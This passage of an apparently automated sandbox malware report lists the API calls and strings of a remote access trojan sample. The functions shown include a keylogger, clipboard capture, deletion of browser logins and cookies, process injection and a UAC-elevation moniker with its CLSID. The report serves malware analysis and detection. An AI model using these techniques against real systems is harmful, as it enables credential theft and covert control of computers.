                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb9dbb4756769c3cd24ee7adcec061e257e704e0881a6f9f62c6e3ac0e16f80b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                                                                                                                                                                                                                            Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                                                                            • API String ID: 1164774033-3681987949
                                                                                                                                                                                                                                            • Opcode ID: 40a99a48df38c0986ea1f072844720ef4507da5861f13f8a5a44a5df557391d4
                                                                                                                                                                                                                                            • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40a99a48df38c0986ea1f072844720ef4507da5861f13f8a5a44a5df557391d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                                                                                                                            Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                                                            • API String ID: 3527384056-432212279
                                                                                                                                                                                                                                            • Opcode ID: 82d3bdde3c1918d27b7ca6b9febe00a20e513e275f4cf8a27e851897e9cca035
                                                                                                                                                                                                                                            • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82d3bdde3c1918d27b7ca6b9febe00a20e513e275f4cf8a27e851897e9cca035
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                                                                                                                                                                                                                            Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                                                                                                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                                                                                                                                            • API String ID: 726551946-3025026198
                                                                                                                                                                                                                                            • Opcode ID: 9f8475bdf6bfba7fa43d22f8bf70a43f1ded6f1e7cb01d1a4d57dc6d9a46443a
                                                                                                                                                                                                                                            • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f8475bdf6bfba7fa43d22f8bf70a43f1ded6f1e7cb01d1a4d57dc6d9a46443a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                                                                                                                                                                                                                            Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenClipboard.USER32 ref: 004159C7
                                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3520204547-0
                                                                                                                                                                                                                                            • Opcode ID: 42efddb075740920b0a99be8245ba2b7744cb55bc38d7abeb996d078b4737da1
                                                                                                                                                                                                                                            • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42efddb075740920b0a99be8245ba2b7744cb55bc38d7abeb996d078b4737da1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                                                                                                                                                            Function 00418764 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                                                                                                            • API String ID: 0-3177665633
                                                                                                                                                                                                                                            • Opcode ID: 0fcdf3723bd403450e4658182a616b4124205e679a17675a4039e88decae9ffb
                                                                                                                                                                                                                                            • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fcdf3723bd403450e4658182a616b4124205e679a17675a4039e88decae9ffb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                                                                                                                                                                                                                                            Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                                                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                                                                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                                                                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                                                                            • String ID: X[G
                                                                                                                                                                                                                                            • API String ID: 1888522110-739899062
                                                                                                                                                                                                                                            • Opcode ID: 485c3068d46bbc27ad7f154d56eccfa046da84bd8fffb3f19a1bbf4f86c2e43c
                                                                                                                                                                                                                                            • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 485c3068d46bbc27ad7f154d56eccfa046da84bd8fffb3f19a1bbf4f86c2e43c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                                                                                                                                                                                                                                            Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                                                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Object_wcslen
                                                                                                                                                                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                                                                            • API String ID: 240030777-3166923314
                                                                                                                                                                                                                                            • Opcode ID: 1499520d982b2c6fe98523ebb7f19fcc58a9361d149757f2a1a63c157573ad6f
                                                                                                                                                                                                                                            • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1499520d982b2c6fe98523ebb7f19fcc58a9361d149757f2a1a63c157573ad6f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                                                                                                                                                                                                                                            Function 004198D2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                                                                                                                                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00419945
                                                                                                                                                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3587775597-0
                                                                                                                                                                                                                                            • Opcode ID: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                                                                                                                                                                                                            • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                                                                                                                                                                                                                                            Function 0041B43F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B539
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B546
                                                                                                                                                                                                                                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B580
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B593
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2341273852-0
                                                                                                                                                                                                                                            • Opcode ID: 9bd09a2d99c30552ee9248d9d3ead224cb3624160a648d3944adbeb409a266ec
                                                                                                                                                                                                                                            • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bd09a2d99c30552ee9248d9d3ead224cb3624160a648d3944adbeb409a266ec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                                                                                                                                                                                                                            Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                                                                                                                                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                                                                            • String ID: Keylogger initialization failure: error
                                                                                                                                                                                                                                            • API String ID: 3219506041-952744263
                                                                                                                                                                                                                                            • Opcode ID: 5af43bf104337a9e081dc86c94caad902621d20e35d05cd08c7acc153c36ae5a
                                                                                                                                                                                                                                            • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5af43bf104337a9e081dc86c94caad902621d20e35d05cd08c7acc153c36ae5a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                                                                                                                                                                                                                                            Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                                                                            • API String ID: 2127411465-314212984
                                                                                                                                                                                                                                            • Opcode ID: 01ca47e6259c52365a860d80c50150ca5f809e30565b780a3dfea60843a9f005
                                                                                                                                                                                                                                            • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01ca47e6259c52365a860d80c50150ca5f809e30565b780a3dfea60843a9f005
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                                                                                                                                            Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                                                              • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                                                                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                                                                                                                                            • API String ID: 2281282204-3981147832
                                                                                                                                                                                                                                            • Opcode ID: 15389f4d20d818ee95bf8d757abcbf9e71d2a033ca16b4e774801a1882311dd6
                                                                                                                                                                                                                                            • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15389f4d20d818ee95bf8d757abcbf9e71d2a033ca16b4e774801a1882311dd6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                                                                                                                                                                                                                            Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                                                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                                                                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                                                                                                                                            • UserProfile, xrefs: 0040B227
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                                                                            • API String ID: 2018770650-1062637481
                                                                                                                                                                                                                                            • Opcode ID: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                                                                                                                                                                                                            • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                                                                                                                                                                                                            Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 3534403312-3733053543
                                                                                                                                                                                                                                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
